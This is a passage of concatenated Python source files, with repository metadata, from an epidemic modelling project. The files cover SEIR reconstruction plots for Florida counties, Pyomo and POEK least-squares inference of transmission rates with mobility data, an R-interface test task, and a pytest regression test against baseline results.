seirdf['Date'] = pd.to_datetime(seirdf['Date'])\n seirdf = seirdf.set_index('Date')\n\n # read the deterministic reconstruction\n detrecondf = pd.read_csv(det_recon_fname, parse_dates=['time'])\n detrecondf['Date'] = pd.to_datetime(detrecondf['time'])\n detrecondf = detrecondf.set_index('Date')\n\n # read the populations\n popdf = pd.read_csv(geodata_fname)\n popdf = popdf.set_index('geoid')\n populations = popdf['pop2010'].to_dict()\n populations = {str(int(k)):v for k,v in populations.items()}\n \n # get the list of counties\n counties = set(seirdf.columns.to_list())\n if 'Date' in counties:\n counties.remove('Date')\n counties.remove('comp')\n counties = sorted(counties)\n\n # get a list of all the files in the recon folder\n recon_files = list()\n for f in os.listdir(recon_folder_name):\n fname = os.path.join(recon_folder_name, f)\n if os.path.isfile(fname):\n filenameonly, extension = os.path.splitext(f)\n if extension == '.csv':\n recon_files.append(fname)\n\n # loop through all the counties and perform the reconstruction\n # based on the reported cases\n pdf = PdfPages(os.path.join(output_path, 'reconstruction-comparison-florida.pdf'))\n for c in counties:\n # this is expensive - we are opening the files for each county\n print('...', c)\n dfsim_S = pd.DataFrame(seirdf[seirdf['comp'] == 'S'][c])\n dfsim_E = seirdf[seirdf['comp'] == 'E'][c]\n dfsim_I1 = seirdf[seirdf['comp'] == 'I1'][c]\n dfsim_I2 = seirdf[seirdf['comp'] == 'I2'][c]\n dfsim_I3 = seirdf[seirdf['comp'] == 'I3'][c]\n dfsim_R = seirdf[seirdf['comp'] == 'R'][c]\n\n dfdetrecon_S = detrecondf[detrecondf['comp']=='S'][c]\n dfdetrecon_E = detrecondf[detrecondf['comp']=='E'][c]\n dfdetrecon_I1 = detrecondf[detrecondf['comp']=='I1'][c]\n dfdetrecon_I2 = detrecondf[detrecondf['comp']=='I2'][c]\n dfdetrecon_I3 = detrecondf[detrecondf['comp']=='I3'][c]\n dfdetrecon_R = detrecondf[detrecondf['comp']=='R'][c]\n\n dfrecon_S = None\n dfrecon_E = None\n dfrecon_I1 = None\n dfrecon_I2 = None\n dfrecon_I3 = None\n dfrecon_R = None\n\n idx = 0\n for rfname in recon_files:\n recondf = pd.read_csv(rfname)\n recondf = recondf.rename({'time':'Date'}, axis='columns')\n recondf.set_index('Date')\n \n tempdf = recondf[recondf['comp']=='S'].set_index('Date')\n if dfrecon_S is None:\n dfrecon_S = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_E = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_I1 = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_I2 = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_I3 = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_R = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n\n tempdf = recondf[recondf['comp']=='S'].set_index('Date')\n dfrecon_S['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='E'].set_index('Date')\n dfrecon_E['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='I1'].set_index('Date')\n dfrecon_I1['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='I2'].set_index('Date')\n dfrecon_I2['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='I3'].set_index('Date')\n dfrecon_I3['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='R'].set_index('Date')\n dfrecon_R['realization_{}'.format(idx)] = tempdf[c]\n idx += 1\n \n dfrecon_S.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfrecon_S.index)].plot(ax=ax, 
color='black', legend='Simulated S')\n dfdetrecon_S[dfdetrecon_S.index.isin(dfrecon_S.index)].plot(ax=ax, color='red', legend='Deterministic_Recon S')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_E.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfrecon_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n dfdetrecon_E[dfdetrecon_E.index.isin(dfrecon_E.index)].plot(ax=ax, color='red', legend='Deterministic_Recon E')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_I1.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfrecon_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n dfdetrecon_I1[dfdetrecon_I1.index.isin(dfrecon_I1.index)].plot(ax=ax, color='red', legend='Deterministic_Recon I1')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_I2.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfrecon_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n dfdetrecon_I2[dfdetrecon_I2.index.isin(dfrecon_I2.index)].plot(ax=ax, color='red', legend='Deterministic_Recon I2')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_I3.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfrecon_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n dfdetrecon_I3[dfdetrecon_I3.index.isin(dfrecon_I3.index)].plot(ax=ax, color='red', legend='Deterministic_Recon I3')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_R.index = pd.to_datetime(dfrecon_R.index)\n ax = dfrecon_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfrecon_R.index)].plot(ax=ax, color='black', legend='Simulated R')\n dfdetrecon_R[dfdetrecon_R.index.isin(dfrecon_R.index)].plot(ax=ax, color='red', legend='Deterministic_Recon R')\n lower_percentile = dfrecon_R.quantile(0.025, axis=1)[dfrecon_R.index[-1]]\n upper_percentile = dfrecon_R.quantile(0.975, axis=1)[dfrecon_R.index[-1]]\n sim_value = dfsim_R[dfrecon_R.index[-1]]\n msg = ''\n if sim_value < lower_percentile or sim_value > upper_percentile:\n msg = '*'\n print('Simulated R outside of 95th percentiles for count {}: ({} ({}) {}) {}'.format(c, lower_percentile, sim_value, upper_percentile, msg))\n\n plt.title('R comparison ({} ({}) {}) {}'.format(lower_percentile, sim_value, upper_percentile, msg))\n pdf.savefig()\n plt.close()\n\n pdf.close()\n\n\n\nif __name__ == '__main__':\n np.random.seed(1975)\n seiiir_fname = './input_data/FL_SEIIIR_R0_2.25_short_realization_4.csv'\n det_recon_fname = './data/FL/recon-det/recon_deterministic_delay_10.csv'\n recon_folder_name = './data/FL/recon-stoch'\n geodata_fname = './input_data/geodata.csv'\n output_path = './figures/'\n \n compare_florida_reconstruction(seiiir_fname, det_recon_fname, recon_folder_name, geodata_fname, output_path)\n \n" }, { "alpha_fraction": 0.6329411864280701, "alphanum_fraction": 0.6399999856948853, "avg_line_length": 21.945945739746094, "blob_id": "70755e3a649d60de84eeb64e2d34f7560fbf1a62", "content_id": "6bfd6cee4fa725d1d12def0980bae531a911e169", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 850, "license_type": "no_license", "max_line_length": 105, "num_lines": 37, "path": "/epi_inference/workflow/Rtest_wf.py", 
"repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\ntry:\n import rpy2\n rpy2_available = True\nexcept:\n rpy2_available = False\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef run(CONFIG, warnings):\n print(\"Running test.R\")\n import rpy2.robjects as robjects\n robjects.r.source('../../../R_utilities/test.R')\n\n\nclass RTestWorkflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"Rtest\",\n \"Simple test of R interface from Python.\")\n\n def run(self, data, CONFIG):\n if not rpy2_available:\n raise RuntimeError(\"ERROR: cannot execute Rtest workflow. Package 'rpy2' is not available.\")\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(RTestWorkflow())\n\n" }, { "alpha_fraction": 0.6073306798934937, "alphanum_fraction": 0.6125896573066711, "avg_line_length": 35.690059661865234, "blob_id": "31b10f20c43239a3b7550c828b7b105a299eb8cc", "content_id": "b6c9c243e6c34ca964617eed4329e5945202d6bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6275, "license_type": "no_license", "max_line_length": 324, "num_lines": 171, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq_poek.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq_poek']\n\nimport itertools\nimport pyutilib.misc.timing as timing\nfrom pyutilib.misc.misc import Bunch\ntry:\n import poek as pk\n poek_available = True\nexcept:\n poek_available = False\n\n\ndef run_multinode_mobility_window_decay_lsq_poek(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. 
If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n if not poek_available:\n raise RuntimeError(\"Cannot solve the mobility window formulation with poek\")\n\n # create the Pyomo optimization formulation\n m = create_inference_window_formulation(\n recon=recon,\n mobility=mobility,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n if m.model is None:\n return {'beta': None, 'status': 'failed', 'msg': 'Empty model.'}\n\n #m.model.write(\"output.nl\")\n # call the solver\n timing.tic('Starting timer for solver')\n nlp = pk.nlp_model(m.model, \"cppad\")\n solver = pk.nlp_solver('ipopt')\n #solver.options['tol']=1e-8\n status = solver.solve(nlp)\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n ##if check_optimal_termination(status) == False:\n ## return {'beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = {}\n for i in recon:\n county = {}\n county['FIPS'] = i\n county['window_days'] = m.window_days\n county['date'] = [recon[i]['dates'][w] for w in m.WINDOWS]\n if i in m.NODES:\n county['population'] = recon[i]['population']\n county['beta'] = []\n county['status'] = []\n county['infections_in_window'] = []\n for w in m.WINDOWS:\n if False and m.beta[i,w].stale == True:\n county['beta'].append( None )\n county['status'].append( 'stale' )\n else:\n county['beta'].append( m.beta[i,w].value )\n county['status'].append( 'ok' )\n county['infections_in_window'].append( m.window_transmissions[i][w] )\n results[i] = county\n\n return results\n\n\ndef create_inference_window_formulation(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. 
If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n\n \"\"\"\n window = int(analysis_window.get('days',14))\n assert(window >= 1)\n\n timing.tic('Starting timer for model construction - POEK')\n model = pk.model()\n\n eta = 0.5 # fraction of the day spent \"away\"\n\n NODES = set(k for k in recon)\n\n T_data = dict()\n I1_data = dict()\n I2_data = dict()\n I3_data = dict()\n S_data = dict()\n populations = dict()\n percent_mobile = dict()\n for nodeid in NODES:\n T_data[nodeid] = recon[nodeid]['transmissions']\n I1_data[nodeid] = recon[nodeid]['I1']\n I2_data[nodeid] = recon[nodeid]['I2']\n I3_data[nodeid] = recon[nodeid]['I3']\n S_data[nodeid] = recon[nodeid]['S']\n populations[nodeid] = recon[nodeid]['population']\n percent_mobile[nodeid] = sum(mobility[nodeid][j] for j in mobility[nodeid] if j in NODES)/populations[nodeid] if nodeid in mobility else 0\n\n if not hasattr(model, 'TIMES'):\n TIMES = [i for i in range(len(recon[nodeid]['transmissions']))]\n timing.toc('setup population and mobility information')\n\n # define the tuples for the windows\n WINDOWS = list()\n WINDOW_TIMES = list()\n window_days = window\n for i in range(len(TIMES)):\n if i % 7 != 0:\n continue\n if i < window_days:\n continue\n for j in range(i+1-window_days, i+1):\n WINDOW_TIMES.append((i,j)) \n WINDOWS.append(i)\n timing.toc('built windows')\n\n # transmission parameter\n beta = model.variable(index=[(i,j) for i in NODES for j in WINDOWS], value=1.0, lb=0)\n timing.toc('built variables')\n\n T_hat = {}\n for i,W in itertools.product(NODES, WINDOW_TIMES):\n w,t = W\n #for i in NODES:\n # for w,t in WINDOW_TIMES:\n\n T_hat[i,w,t] = beta[i,w] * ((I1_data[i][t] + I2_data[i][t] + I3_data[i][t]) /populations[i] * S_data[i][t] * (1-eta*percent_mobile[i])) + sum(beta[j,w] * ((I1_data[j][t] + I2_data[j][t] + I3_data[j][t]) * S_data[i][t] * mobility[i][j] * eta / (populations[i]*populations[j])) for j in mobility[i] if j in NODES)\n\n timing.toc('built infection process')\n\n # least squares objective function\n lse = {}\n for i in NODES:\n lse[i] = sum( (T_hat[i,w,t] - T_data[i][t])**2 for w,t in WINDOW_TIMES)\n\n model.add( sum(lse[i] for i in NODES) )\n timing.toc('built objective')\n\n # get the approximate transmissions over the window period\n window_transmissions = dict()\n for i in NODES:\n d = dict()\n for w in WINDOWS:\n d[w] = sum(T_data[i][t] for ww,t in WINDOW_TIMES if ww == w)\n window_transmissions[i] = d\n \n return Bunch(model=model, WINDOWS=WINDOWS, window_transmissions=window_transmissions, beta=beta, NODES=NODES, window_days=window_days)\n\n" }, { "alpha_fraction": 0.5602084994316101, "alphanum_fraction": 0.5696094632148743, "avg_line_length": 42.98871994018555, "blob_id": "a86341fe6c6bf428395f88eb83d68faa51a833e2", "content_id": "8db82bc7894d68d40a7fedbe4dacbf904e884f6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11701, "license_type": "no_license", "max_line_length": 188, "num_lines": 266, "path": "/epi_inference/tests/test_run_on_simulated.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport yaml\nimport numpy as np\nimport pandas as pd\n\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.engine import driver\nfrom 
epi_inference.util import compare_json, compare_csv\n\nskip_new_files = False\n\nclass TestRunOnSimulated():\n @classmethod\n def setup_class(cls):\n # change to the test directory\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n rundir = os.path.join(thisfiledir, 'run_on_simulated')\n os.chdir(rundir)\n\n @classmethod\n def teardown_class(cls):\n # return to the previous directory\n os.chdir(cls._origdir)\n\n def test_run_on_simulated(self):\n args = Options()\n args.block = 'all'\n args.config_file = './workflows/run_on_simulated.yml'\n args.verbose = True\n\n # remove old results files used in comparison\n res_files = _walk_files('results/run_on_simulated', '.json')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated', f))\n res_files = _walk_files('results/run_on_simulated', '.csv')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated', f))\n\n driver.run(args)\n\n #\n # compare the reconstruction results\n #\n # read in the simulation data\n simdf = pd.read_csv('./simulated_data/SEIIIR_R0_2.25_short_realization_4.csv')\n \n # read in the seeds to help with comparisons\n with open('./config/seeds_50.yml', 'r') as fd:\n seeds = yaml.safe_load(fd)\n seeds = [str(sd) for sd in seeds]\n\n #\n # Comparison of results with simulation parameters\n # If these tests pass, it is safe to update the gold standards compared later\n series = ['transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R']\n\n # read all the json files and compute statistics across the seeds\n recon = dict()\n for sd in seeds:\n with open('./results/run_on_simulated/reconstruct_stochastic_confirmed/recon_stochastic_10_{}.json'.format(str(sd)),'r') as fd:\n recon[sd] = json.load(fd)\n\n counties = list(recon[seeds[0]].keys())\n dates = list(recon[seeds[0]][counties[0]][\"dates\"])\n\n # check that the counties are the same across all realizations\n for sd in seeds:\n assert counties == list(recon[sd].keys())\n\n # check that the dates are the same across all counties, realizations\n for cname in counties:\n for sd in seeds:\n assert dates == recon[sd][cname]['dates']\n\n # check each county, date, series\n total_count = 0\n outside_count = 0\n mean_error_count = 0\n for cname in counties:\n for sname in series:\n sim = simdf[simdf['comp']==sname]\n for i,dt in enumerate(dates):\n if dt in sim.Date.values:\n simdt = sim[sim['Date']==dt]\n data = list()\n for sd in seeds:\n data.append(recon[sd][cname][sname][i])\n data = np.asarray(data)\n mn = np.mean(data)\n ql = np.quantile(data,q=0.025)\n qu = np.quantile(data,q=0.975)\n v = float(simdt[cname].values)\n total_count += 1\n if (v < ql or v > qu):\n outside_count += 1\n # print('Outside confidence:', cname, sname, dt, v, ':', ql, mn, qu)\n if abs(v-mn) > 10 and abs(v-mn)/max(1,v) > 0.2:\n mean_error_count += 1\n # print('Error with mean > 20%:', cname, sname, dt, v, ':', ql, mn, qu)\n\n print('Reconstruction fraction outside 95%:', outside_count/total_count)\n print('Reconstruction fraction with error in mean > 20%:', mean_error_count/total_count)\n assert outside_count / total_count < 0.05\n assert mean_error_count / total_count < 0.05\n\n #\n # compare the inference results\n # This comparison is filtered - window must have at least 50 cases,\n # and there must be at least 25 (half) realizations with estimates\n #\n # read all the json files and compute statistics across the seeds\n inference = dict()\n for sd in seeds:\n with 
open('./results/run_on_simulated/inference_stochastic_confirmed/inference_mobility_window_10_{}.json'.format(str(sd)),'r') as fd:\n inference[sd] = json.load(fd)\n\n counties = list(inference[seeds[0]].keys())\n dates = list(inference[seeds[0]][counties[0]][\"date\"])\n\n # check that the counties are the same across all realizations\n for sd in seeds:\n assert counties == list(inference[sd].keys())\n\n # check that the dates are the same across all counties, realizations\n for cname in counties:\n for sd in seeds:\n assert dates == inference[sd][cname]['date']\n\n # check each county, date\n total_count = 0\n outside_count = 0\n mean_error_count = 0\n for cname in counties:\n for i,dt in enumerate(dates):\n data = list()\n for sd in seeds:\n estbeta = inference[sd][cname]['beta'][i]\n if estbeta is not None and inference[sd][cname]['infections_in_window'][i] > 50: # filter out insufficient data - 100 means there were only ~10 reported cases in window\n data.append(estbeta)\n if len(data) >= 25: ### # need at least 10 that are not None to get some statistics\n data = np.asarray(data)\n mn = np.mean(data)\n ql = np.quantile(data,q=0.025)\n qu = np.quantile(data,q=0.975)\n v = 2.25/4.3\n total_count += 1\n if (v < ql or v > qu):\n outside_count += 1\n # print('Beta outside confidence:', cname, 'beta', dt, v, ':', ql, mn, qu, '# Not None:', len(data) )\n if abs(v-mn)/max(1,v) > 0.2:\n mean_error_count += 1\n # print('Beta error with mean > 20%:', cname, 'beta', dt, v, ':', ql, mn, qu, '# Not None:', len(data))\n\n print('Inference fraction outside 95%:', outside_count/total_count)\n print('Inference fraction with error in mean > 20%:', mean_error_count/total_count)\n assert outside_count / total_count < 0.05\n assert mean_error_count / total_count < 0.15\n\n #\n # compare all the json files (gold standard)\n #\n res_json_files = _walk_files('results/run_on_simulated', '.json')\n baseline_json_files = set(_walk_files('baseline/run_on_simulated', '.json'))\n for f in res_json_files:\n if not skip_new_files:\n assert f in baseline_json_files # if this fails then there are files in the new results that are not in the baseline\n\n if f in baseline_json_files:\n baseline_json_files.remove(f)\n res_file = os.path.join('results/run_on_simulated', f)\n baseline_file = os.path.join('baseline/run_on_simulated', f)\n compare_json(res_file, baseline_file, abs_tol=1e-6)\n\n if len(baseline_json_files) != 0:\n print(baseline_json_files)\n assert len(baseline_json_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\n #\n # compare all the csv files (gold standard)\n #\n res_csv_files = _walk_files('results/run_on_simulated', '.csv')\n baseline_csv_files = set(_walk_files('baseline/run_on_simulated', '.csv'))\n for f in res_csv_files:\n if not skip_new_files:\n assert f in baseline_csv_files # if this fails then there are files in the new results that are not in the baseline\n if f in baseline_csv_files:\n baseline_csv_files.remove(f)\n res_file = os.path.join('results/run_on_simulated', f)\n baseline_file = os.path.join('baseline/run_on_simulated', f)\n compare_csv(res_file, baseline_file, check_exact=False)\n\n if len(baseline_csv_files) != 0:\n print(baseline_csv_files)\n assert len(baseline_csv_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\n\n @pytest.mark.skip('skipped - not testing anything that run_on_simulated does not')\n def test_run_on_simulated_half(self):\n args = Options()\n 
args.block = 'all'\n args.config_file = './workflows/run_on_simulated_half.yml'\n args.verbose = True\n\n # remove old results files used in comparison\n res_files = _walk_files('results/run_on_simulated_half', '.json')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated_half', f))\n res_files = _walk_files('results/run_on_simulated_half', '.csv')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated_half', f))\n\n driver.run(args)\n\n #\n # compare all the json files (gold standard)\n #\n res_json_files = _walk_files('results/run_on_simulated_half', '.json')\n baseline_json_files = set(_walk_files('baseline/run_on_simulated_half', '.json'))\n for f in res_json_files:\n if not skip_new_files:\n assert f in baseline_json_files # if this fails then there are files in the new results that are not in the baseline\n\n if f in baseline_json_files:\n baseline_json_files.remove(f)\n res_file = os.path.join('results/run_on_simulated_half', f)\n baseline_file = os.path.join('baseline/run_on_simulated_half', f)\n compare_json(res_file, baseline_file, abs_tol=1e-6)\n\n assert len(baseline_json_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\n #\n # compare all the csv files (gold standard)\n #\n res_csv_files = _walk_files('results/run_on_simulated_half', '.csv')\n baseline_csv_files = set(_walk_files('baseline/run_on_simulated_half', '.csv'))\n for f in res_csv_files:\n if not skip_new_files:\n assert f in baseline_csv_files # if this fails then there are files in the new results that are not in the baseline\n if f in baseline_csv_files:\n baseline_csv_files.remove(f)\n res_file = os.path.join('results/run_on_simulated_half', f)\n baseline_file = os.path.join('baseline/run_on_simulated_half', f)\n compare_csv(res_file, baseline_file, check_exact=False)\n \n assert len(baseline_csv_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\ndef _walk_files(basepath, extension):\n # get all the files of a particular extension in the directory tree\n ret_files = list()\n\n for path, folders, files in os.walk(basepath):\n for f in files:\n fname, fext = os.path.splitext(f)\n if fext == extension:\n relfname = os.path.relpath(os.path.join(path,f), basepath)\n ret_files.append(relfname)\n return ret_files\n" }, { "alpha_fraction": 0.6022974252700806, "alphanum_fraction": 0.6071613430976868, "avg_line_length": 46.367645263671875, "blob_id": "23071f9d2fa0ab72d5d0af91d1d4b059a36b329d", "content_id": "e733b351de64bfb23ef20f17a667167c225e3801", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9663, "license_type": "no_license", "max_line_length": 327, "num_lines": 204, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq_iterative.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq_iterative']\n\nimport pyutilib.misc.timing as timing\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\n\nfrom .util import get_windows, indices_since_first_nonzero\n\ndef run_multinode_mobility_window_decay_lsq_iterative(*, recon, mobility, analysis_window, objective, select_window=None, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n 
recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n mobility: dict()\n A dictionary of sparse mobility data\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the inference. If None, then the full set of data will be used.\n The key \"days\" indicates the length of the analysis window in days. The\n date returned in the analysis is the last day of this window.\n objective : str\n Choice of objective function to use. Least-squares (lsq) is the default.\n select_window: str\n Date corresponding to a particular window for analysis\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n timing.tic('Starting timer for model construction - Pyomo')\n # check the input data\n assert objective == 'lsq' or objective == 'binomial-likelihood'\n window_length_days = int(analysis_window.get('days',14))\n assert(window_length_days >= 1)\n\n eta = 0.5 # fraction of the day spent \"away\"\n\n # create the set of nodes used in the model - use sorted_nodes for\n # determinism, the set nodes for check\n nodes = set(k for k in recon)\n sorted_nodes = sorted(nodes)\n\n # build data structures for the parameters\n T_data = dict()\n I1_data = dict()\n I2_data = dict()\n I3_data = dict()\n S_data = dict()\n orig_rep_cases = dict()\n days_since_first_reported = dict()\n populations = dict()\n percent_mobile = dict()\n dates = None\n for nodeid in sorted_nodes:\n T_data[nodeid] = recon[nodeid]['transmissions']\n I1_data[nodeid] = recon[nodeid]['I1']\n I2_data[nodeid] = recon[nodeid]['I2']\n I3_data[nodeid] = recon[nodeid]['I3']\n S_data[nodeid] = recon[nodeid]['S']\n orig_rep_cases[nodeid] = recon[nodeid]['orig_rep_cases']\n days_since_first_reported[nodeid] = indices_since_first_nonzero(orig_rep_cases[nodeid])\n populations[nodeid] = recon[nodeid]['population']\n percent_mobile[nodeid] = sum(mobility[nodeid][j] for j in mobility[nodeid] if j in nodes)/populations[nodeid] if nodeid in mobility else 0\n\n if dates is None:\n # dates should be the same across all counties\n dates = recon[nodeid]['dates']\n assert dates == recon[nodeid]['dates']\n\n timing.toc('setup inference parameters (transmissions, population, mobility, etc.')\n\n # define the WINDOW_TIMES tuple pairs for the windows\n windows = get_windows(dates, window_days=window_length_days, select_window=select_window)\n WINDOW_TIMES = windows.WINDOW_TIMES\n\n # gather some extra data to be reported with the window period\n # approx. 
transmissions and infections (from reconstruction)\n # and reported cases,\n window_transmissions = dict()\n infectious_pop_over_window = dict()\n transmissions_over_window = dict()\n reported_cases_over_window = dict()\n days_since_first_reported_by_window = dict()\n for i in sorted_nodes:\n infectious_pop_over_window[i] = dict()\n transmissions_over_window[i] = dict()\n reported_cases_over_window[i] = dict()\n days_since_first_reported_by_window[i] = dict()\n d = dict()\n for w in WINDOW_TIMES:\n d[w] = sum(T_data[i][t] for t in WINDOW_TIMES[w])\n infectious_pop_over_window[i][w] = list(I1_data[i][t] + I2_data[i][t] + I3_data[i][t] for t in WINDOW_TIMES[w])\n transmissions_over_window[i][w] = list(T_data[i][t] for t in WINDOW_TIMES[w])\n reported_cases_over_window[i][w] = list(orig_rep_cases[i][t] for t in WINDOW_TIMES[w])\n days_since_first_reported_by_window[i][w] = days_since_first_reported[i][WINDOW_TIMES[w][-1]]\n window_transmissions[i] = d\n\n # Setup results object\n results = {}\n for i in recon:\n county = {}\n county['FIPS'] = i\n county['window_days'] = window_length_days\n county['date'] = [recon[i]['dates'][w] for w in WINDOW_TIMES]\n if i in nodes:\n county['population'] = recon[i]['population']\n county['beta'] = []\n county['status'] = []\n county['infections_in_window'] = []\n county['infectious_pop_over_window'] = []\n county['transmissions_over_window'] = []\n county['reported_cases_over_window'] = []\n county['days_since_first_reported'] = []\n results[i] = county\n\n #\n # Setup and solve different problems for each window\n #\n for w in WINDOW_TIMES:\n timing.tic('Starting timer for model construction - Pyomo')\n model = pe.ConcreteModel()\n model.NODES = pe.Set(initialize=sorted_nodes, ordered=True)\n model.beta = pe.Var(model.NODES, initialize=1.0, bounds=(0,None)) \n\n # check the total number of infections - if there are none across\n # all counties, the optimization will not run\n total_infections = 0\n for t in WINDOW_TIMES[w]:\n for i in sorted_nodes:\n total_infections += I1_data[i][t] + I2_data[i][t] + I3_data[i][t]\n\n if total_infections > 0:\n # define the expression for estimated transmissions\n def _infection_process(m, i, t):\n return model.beta[i] * ((I1_data[i][t] + I2_data[i][t] + I3_data[i][t]) /populations[i] * S_data[i][t] * (1-eta*percent_mobile[i])) + sum(model.beta[j] * ((I1_data[j][t] + I2_data[j][t] + I3_data[j][t]) * S_data[i][t] * mobility[i][j] * eta / (populations[j]*populations[i])) for j in mobility[i] if j in nodes)\n \n model.T_hat = pe.Expression(model.NODES, WINDOW_TIMES[w], rule=_infection_process)\n\n # we want to record which T_hat expressions are guaranteed to be zero\n # so we can remove them from the likelihood function (don't want ln(0))\n # since they are initialized to 1.0, we can easily check this by\n # evaluating them. 
If they evaluate to zero, then we record the indices\n zero_T_hats = set()\n for n in model.NODES:\n for t in WINDOW_TIMES[w]:\n if abs(pe.value(model.T_hat[n,t])) < 1e-10:\n zero_T_hats.add((n,t))\n\n timing.toc('built infection process')\n\n model.total_lse = pe.Objective(expr=sum((model.T_hat[i,t] - T_data[i][t])**2 for i,t in model.T_hat)/len(model.T_hat))\n timing.toc('built objective')\n\n # call the solver\n timing.tic('Starting timer for solver')\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(model, options={'print_level':0})\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'beta': None, 'status': 'failed', 'msg': 'Unknown solver error for window %s and time %s.' % (str(w),str(t))}\n\n if objective == 'binomial-likelihood':\n # solve the binomial-likelihood\n # note that we want the call to the lsq part above to initialize\n model.total_like = pe.Objective(\n expr=sum( T_data[i][t]*pe.log(1.0-pe.exp(-model.T_hat[i,t]/S_data[i][t])) + (S_data[i][t]-T_data[i][t])*(-model.T_hat[i,t]/S_data[i][t]) \\\n for i,t in model.T_hat if (i,t) not in zero_T_hats),\n sense=pe.maximize\n )\n model.total_lse.deactivate()\n timing.tic('Starting timer for solver with likelihood objective')\n status = solver.solve(model, tee=True)\n timing.toc('Finished solver with likelihood objective')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'beta': None, 'status': 